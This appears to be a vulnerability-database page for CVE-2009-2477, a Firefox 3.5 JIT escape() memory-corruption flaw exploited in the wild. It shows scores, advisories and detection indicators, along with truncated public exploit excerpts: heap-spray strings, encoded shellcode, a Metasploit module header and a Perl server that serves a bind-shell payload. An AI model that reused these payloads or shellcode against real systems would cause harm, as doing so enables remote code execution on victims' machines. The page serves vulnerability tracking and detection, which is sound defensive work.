CVE-2009-2477
published 2009-07-15CVE-2009-2477: js/src/jstracer.cpp in the Just-in-time (JIT) JavaScript compiler (aka TraceMonkey) in Mozilla Firefox 3.5 before 3.5.1 allows remote attackers to execute…
PriorityP268critical9.3CVSS 2.0
AVNACMAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
42.69%
98.5th percentile
js/src/jstracer.cpp in the Just-in-time (JIT) JavaScript compiler (aka TraceMonkey) in Mozilla Firefox 3.5 before 3.5.1 allows remote attackers to execute arbitrary code via certain use of the escape function that triggers access to uninitialized memory locations, as originally demonstrated by a document containing P and FONT elements.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | firefox | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%u0c0c%u0c0c
- →Trigger is JavaScript use of the escape() function in Firefox 3.5 JIT (TraceMonkey); look for HTML documents combining <P> and <FONT> elements with escape() calls in JavaScript ↗
- →Exploit delivers payload via HTTP response with Content-Type text/html; charset=utf-8 — monitor for browser exploit pages serving heap-spray JavaScript with repeated %u0c0c%u0c0c NOP sleds ↗
- →Heap spray uses 800 containers of block length 0x60000 filled with 0x0c0c0c0c return address on Windows XP; detect large allocation loops in JS with repeated unescape('%u0c0c%u0c0c') patterns ↗
- →The Metasploit module targets Firefox 3.5.0 specifically (ua_minver/ua_maxver both '3.5'); User-Agent filtering on Firefox/3.5 can help scope detections ↗
- →Exploit HTML structure uses randomised variable names but always contains a custom escapeData() function iterating over characters and a sprayready flag; look for this pattern in script blocks ↗
- ·Vulnerability is specific to Firefox 3.5 before 3.5.1; the JIT compiler (TraceMonkey) must be enabled. Firefox 3.5.1 and later are not affected. ↗
- ·Metasploit module was only tested on Windows but notes it should work on other platforms; the Mac OS X target uses a different Ret value (0x41414141) and much larger container count (800000), so heap-spray thresholds differ per platform ↗
- ·A related exploit (EDB-40936) targets Naenara Browser 3.5 (RedStar OS 3.0 Desktop), a North Korean Firefox fork based on the same vulnerable codebase; detection rules should account for this variant ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.3CRITICAL
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
firefox 3.5 various flaws
vendor_redhat·2009-07-14·CVSS 9.3
CVE-2009-2477 [CRITICAL] firefox 3.5 various flaws
firefox 3.5 various flaws
js/src/jstracer.cpp in the Just-in-time (JIT) JavaScript compiler (aka TraceMonkey) in Mozilla Firefox 3.5 before 3.5.1 allows remote attackers to execute arbitrary code via certain use of the escape function that triggers access to uninitialized memory locations, as originally demonstrated by a document containing P and FONT elements.
GHSA
GHSA-p5fj-7pgr-xv7v: js/src/jstracer
ghsa_unreviewed·2022-05-02
CVE-2009-2477 [HIGH] CWE-94 GHSA-p5fj-7pgr-xv7v: js/src/jstracer
js/src/jstracer.cpp in the Just-in-time (JIT) JavaScript compiler (aka TraceMonkey) in Mozilla Firefox 3.5 before 3.5.1 allows remote attackers to execute arbitrary code via certain use of the escape function that triggers access to uninitialized memory locations, as originally demonstrated by a document containing P and FONT elements.
VulnCheck
Mozilla Firefox Improper Control of Generation of Code ('Code Injection')
vulncheck·2009·CVSS 9.3
CVE-2009-2477 [CRITICAL] Mozilla Firefox Improper Control of Generation of Code ('Code Injection')
Mozilla Firefox Improper Control of Generation of Code ('Code Injection')
js/src/jstracer.cpp in the Just-in-time (JIT) JavaScript compiler (aka TraceMonkey) in Mozilla Firefox 3.5 before 3.5.1 allows remote attackers to execute arbitrary code via certain use of the escape function that triggers access to uninitialized memory locations, as originally demonstrated by a document containing P and FONT elements.
Affected: Mozilla Firefox
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.virusbulletin.com/virusbulletin/2010/05/exploit-kit-explosion-part-two-vectors-attack/
No detection rules found.
Exploit-DB
Naenara Browser 3.5 (RedStar 3.0 Desktop) - 'JACKRABBIT' Client-Side Command Execution
exploitdb·2016-12-18
CVE-2009-2477 Naenara Browser 3.5 (RedStar 3.0 Desktop) - 'JACKRABBIT' Client-Side Command Execution
Naenara Browser 3.5 (RedStar 3.0 Desktop) - 'JACKRABBIT' Client-Side Command Execution
---
n0m3rcYn0M3rCyn0m3Rc
N0MeRCYn0m3rCyn0m3rCyn0m
n0MERCypDK
var xunescape = unescape;
oneblock = xunescape("%u0040%u1000");
stackpivot = xunescape("%u6885%u0805%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u5a91%u0805%u4141%u4141");
nopsled = xunescape("%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8
Exploit-DB
Mozilla Firefox 3.5 - 'escape()' Return Value Memory Corruption (Metasploit)
exploitdb·2010-09-20
CVE-2009-2477 Mozilla Firefox 3.5 - 'escape()' Return Value Memory Corruption (Metasploit)
Mozilla Firefox 3.5 - 'escape()' Return Value Memory Corruption (Metasploit)
---
##
# $Id: firefox_escape_retval.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::FF,
:ua_minver => "3.5",
:ua_maxver => "3.5",
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking, # reliable memory corruption
:vuln_test => nil,
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Firefox 3.5 escape() Return Value Memory Corruption',
'Description' => %q{
This module explo
Exploit-DB
Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (2)
exploitdb·2009-07-20
CVE-2009-2477 Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (2)
Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (2)
---
##################################################
# FireFox 3.5 Heap Spray
# Discovered by: Simon Berry-Bryne
# Coded in Perl by netsoul, ALTO PARANA - Paraguay
# Contact: netsoul2 [at] gmail [dot] com
##################################################
#!/usr/bin/perl -w
use strict;
use POE::Component::Server::HTTP;
POE::Component::Server::HTTP->new(Port => my $port = 8080,
ContentHandler => {"/" => sub{$_[1]->push_header("Content-Type", "text/html"), $_[1]->content()}});
print "[-] Listening in port $port...\n[-] Sending payload...\n[-] After 30 secs try with netcat for connect in port 5500\n";
POE::Kernel->run();
__DATA__
Exploiting Firefox 3.5
//windows - shell_bind_tcp - metasploit - encoding is shikata_ga_nai
var shel
Exploit-DB
Mozilla Firefox 3.5 - Font tags Remote Buffer Overflow
exploitdb·2009-07-13
CVE-2009-2478 Mozilla Firefox 3.5 - Font tags Remote Buffer Overflow
Mozilla Firefox 3.5 - Font tags Remote Buffer Overflow
---
Firefox 3.5 Vulnerability
Firefox 3.5 Heap Spray Vulnerabilty
Author: SBerry aka Simon Berry-Byrne
Thanks to HD Moore for the insight and Metasploit for the payload
Loremipsumdoloregkuw
Loremipsumdoloregkuwiert
Loremikdkw
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u448
Metasploit
Firefox 3.5 escape() Return Value Memory Corruption
metasploit
Firefox 3.5 escape() Return Value Memory Corruption
Firefox 3.5 escape() Return Value Memory Corruption
This module exploits a memory corruption vulnerability in the Mozilla Firefox browser. This flaw occurs when a bug in the javascript interpreter fails to preserve the return value of the escape() function and results in uninitialized memory being used instead. This module has only been tested on Windows, but should work on other platforms as well with the current targets.
http://blog.mozilla.com/security/2009/07/14/critical-javascript-vulnerability-in-firefox-35/http://isc.sans.org/diary.html?storyid=6796http://secunia.com/advisories/35798http://sunsolve.sun.com/search/document.do?assetkey=1-66-266148-1http://voices.washingtonpost.com/securityfix/2009/07/stopgap_fix_for_critical_firef.htmlhttp://www.exploit-db.com/exploits/9137http://www.exploit-db.com/exploits/9181http://www.h-online.com/security/First-Zero-Day-Exploit-for-Firefox-3-5--/news/113761http://www.kb.cert.org/vuls/id/443060http://www.mozilla.org/security/announce/2009/mfsa2009-41.htmlhttp://www.securityfocus.com/bid/35660http://www.vupen.com/english/advisories/2009/1868https://bugzilla.mozilla.org/show_bug.cgi?id=503286https://www.exploit-db.com/exploits/40936/https://www.redhat.com/archives/fedora-package-announce/2009-July/msg00909.htmlhttp://blog.mozilla.com/security/2009/07/14/critical-javascript-vulnerability-in-firefox-35/http://isc.sans.org/diary.html?storyid=6796http://secunia.com/advisories/35798http://sunsolve.sun.com/search/document.do?assetkey=1-66-266148-1http://voices.washingtonpost.com/securityfix/2009/07/stopgap_fix_for_critical_firef.htmlhttp://www.exploit-db.com/exploits/9137http://www.exploit-db.com/exploits/9181http://www.h-online.com/security/First-Zero-Day-Exploit-for-Firefox-3-5--/news/113761http://www.kb.cert.org/vuls/id/443060http://www.mozilla.org/security/announce/2009/mfsa2009-41.htmlhttp://www.securityfocus.com/bid/35660http://www.vupen.com/english/advisories/2009/1868https://bugzilla.mozilla.org/show_bug.cgi?id=503286https://www.exploit-db.com/exploits/40936/https://www.redhat.com/archives/fedora-package-announce/2009-July/msg00909.html
2009-07-15
Published
Exploited in the wild